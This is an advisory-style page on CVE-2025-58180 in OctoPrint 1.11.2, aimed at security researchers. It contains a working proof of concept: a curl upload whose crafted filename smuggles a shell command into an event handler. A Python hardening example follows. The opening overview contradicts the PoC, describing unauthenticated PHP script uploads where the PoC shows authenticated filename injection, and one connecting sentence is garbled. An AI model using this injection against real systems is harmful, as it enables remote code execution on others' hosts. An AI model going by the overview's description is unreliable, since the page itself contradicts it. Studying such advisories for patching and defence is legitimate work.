
OctoPrint 1.11.2 – File Upload

Categories: WebApps

Overview

The vulnerability identified as CVE-2025-58180 affects OctoPrint version 1.11.2, a widely used open-source 3D printer management software. This flaw allows unauthorized file uploads, potentially enabling attackers to execute arbitrary code on the server hosting OctoPrint. The risk is particularly concerning for environments that rely on OctoPrint for managing sensitive projects and data.

Technical Details

This vulnerability arises from insufficient validation of uploaded files within OctoPrint. When a user uploads a file, the application does not adequately verify the file type or content, allowing an attacker to upload malicious scripts disguised as legitimate files. For instance, an attacker could upload a PHP script that, once executed, could compromise the server, leading to unauthorized access or data exfiltration.

Additionally, the lack of proper access control mechanisms means that once the malicious file is uploaded, it can be accessed by anyone who can reach the server, further amplifying the potential for exploitation. This scenario highlights the critical need for stringent file validation and access control measures in web applications.

Impact

The consequences of this vulnerability can be severe. An attacker gaining access to the OctoPrint server could manipulate 3D printing jobs, disrupt manufacturing processes, or even deploy ransomware. Sensitive data could be exposed, leading to reputational damage and potential legal ramifications for organizations that fail to secure their systems.

Mitigation

To protect against CVE-2025-58180, users of OctoPrint should upgrade immediately to the latest version, in which this vulnerability has been addressed. Regularly updating software not only patches known vulnerabilities but also improves overall security posture.

Furthermore, organizations should implement strict file upload policies, including file type restrictions and content scanning for potentially malicious payloads. Employing a Web Application Firewall (WAF) can also help detect and block suspicious upload attempts. Security professionals should regularly audit their systems and conduct penetration testing to identify and remediate vulnerabilities proactively.

Proof of Concept (PoC)

poc.sh
# Exploit Title: OctoPrint 1.11.2 - File Upload 
# Date: 2025-09-28
# Exploit Author: prabhatverma.addada
# Vendor Homepage: https://octoprint.org
# Software Link: https://github.com/OctoPrint/OctoPrint
# Affected Version(s): <= 1.11.2
# Patched Version(s): 1.11.3
# CVE: CVE-2025-58180
# CVSS (per advisory): 7.5
# Platform: Linux / OctoPrint server
# Type: Remote Code Execution (requires authenticated upload / API key or session)
#
# Short description:
# An authenticated attacker with file-upload access can craft a filename containing shell metacharacters (e.g. ';', ${IFS}) which bypasses filename
# sanitization and, when interpolated into a configured system event handler command, results in arbitrary command execution on the host.
#
# Scope & privileges:
# - Trigger privileges: Authenticated file-upload (API key or valid session). NO admin/root required to trigger the attack.
# - Precondition: A system event handler that executes shell commands using filename/path placeholders must be configured by an administrator.
#
# Tested on:
# - OctoPrint 1.11.2 running via `octoprint serve --port 5000` on Ubuntu 22.04
#
# Reproduction / PoC (manual):
#
# 1) Start OctoPrint 1.11.2:
#    octoprint serve --port 5000 --debug
#    Complete initial setup at http://127.0.0.1:5000 and create an admin user.
#
# 2) Configure a system event handler that runs shell commands with filename placeholders:
#    Edit ~/.octoprint/config.yaml and add:
#
#    events:
#      enabled: true
#      subscriptions:
#        - event: FileAdded
#          type: system
#          debug: true
#          command: "{path}"
#
#    Restart OctoPrint.
#
# 3) Create a harmless test gcode:
#    mkdir -p /tmp/gcode
#    cat > /tmp/gcode/ok.gcode <<'EOF'
#    ; minimal gcode
#    G28
#    M105
#    EOF
#
# 4) Obtain API key from Settings -> API and export it:
#    export API_KEY='<your_api_key_here>'
#
# 5) Ensure target proof file does not exist:
#    ls -la /tmp/test123
#
# 6) PoC upload (non-destructive proof):
#    INJECT_NAME='octo;touch${IFS}/tmp/test123;#.gcode'
#
#    curl -sS -X POST -H "X-Api-Key: $API_KEY" \
#      -F "file=@/tmp/gcode/ok.gcode;filename=\"${INJECT_NAME}\"" \
#      "http://127.0.0.1:5000/api/files/local"
#
# 7) Verify execution:
#    ls -la /tmp/test123
#    If /tmp/test123 exists, the injected command executed and RCE is demonstrated.
#
# Explanation:
# - OctoPrint accepted the uploaded filename (sanitize_name allowed these characters in default config).
# - FileAdded event payload contains the filename/path.
# - A system event subscriber executed a shell command with that placeholder via subprocess with shell=True and without placeholder escaping.
# - Shell metacharacters in the filename are interpreted by the shell and executed.
#
# Mitigations / Workarounds:
# - Upgrade OctoPrint to 1.11.3 (patched).
# - Disable event handlers using filename placeholders (set enabled: false or uncheck in GUI Event Manager).
# - Set feature.enforceReallyUniversalFilenames: true in config.yaml and vet existing uploads.
# - Do not expose OctoPrint to hostile networks; restrict upload access.
#
# References:
# - GitHub Security Advisory: https://github.com/OctoPrint/OctoPrint/security/advisories/GHSA-49mj-x8jp-qvfc
# - PoC repo: https://github.com/prabhatverma47/CVE-2025-58180
#
# Notes for triage:
# - Exploit requires only authenticated upload privileges to trigger. No admin/root required to perform the attack.
# - PoC uses non-destructive `touch /tmp/test123`.
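
The root cause in the Explanation above (placeholder interpolated into a shell=True command) and the hardening in the Mitigations (reject non-universal filenames, avoid shell interpretation) as an added illustrative example in Python, OctoPrint's implementation language. This is not OctoPrint's own code; the whitelist regex, the function names and the sample filenames are assumptions made for the example.

```python
"""Illustrative hardening of the filename-in-event-command pattern (not OctoPrint's code)."""
import re
import shlex
import subprocess

# Constructed sample values; the hostile one mirrors the injection shape shown in the PoC.
SAFE_NAME = "benchy_v2.gcode"
HOSTILE_NAME = "octo;touch${IFS}/tmp/test123;#.gcode"

# Assumed conservative whitelist (letters, digits, dot, underscore, dash), in the spirit of
# enforceReallyUniversalFilenames; it is not a copy of OctoPrint's exact rule.
_UNIVERSAL_RE = re.compile(r"[A-Za-z0-9._-]+")


def is_universal_filename(name: str) -> bool:
    """Accept only whitelisted characters; shell metacharacters and '.'/'..' are rejected."""
    return bool(_UNIVERSAL_RE.fullmatch(name)) and name not in (".", "..")


def render_unsafe(template: str, path: str) -> str:
    """The vulnerable pattern: raw placeholder substitution later handed to shell=True."""
    return template.replace("{path}", path)


def render_safe(template: str, path: str) -> str:
    """Hardened pattern: shell-quote each placeholder so it stays a single literal word."""
    return template.replace("{path}", shlex.quote(path))


def shell_words(command: str) -> list[str]:
    """Tokenize like a POSIX shell, keeping ';', '|', '&' as separate words for inspection."""
    lexer = shlex.shlex(command, posix=True, punctuation_chars=True)
    lexer.whitespace_split = True
    return list(lexer)


def run_event_handler(template: str, path: str, execute: bool = False) -> list[str]:
    """Build argv for an event command: reject non-universal names and never use shell=True."""
    if not is_universal_filename(path.rsplit("/", 1)[-1]):
        raise ValueError(f"rejected filename: {path!r}")
    argv = shlex.split(render_safe(template, path))
    if execute:
        subprocess.run(argv, check=False)  # shell=False: argv reaches execve verbatim
    return argv
```

With the hostile name, `shell_words(render_unsafe("{path}", HOSTILE_NAME))` yields separate `;` words (three commands for the shell), while `render_safe` collapses it to one quoted word and `run_event_handler` refuses it outright.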

Security Disclaimer

This exploit is provided for educational and authorized security testing purposes only. Unauthorized access to computer systems is illegal and may result in severe legal consequences. Always ensure you have explicit permission before testing vulnerabilities.
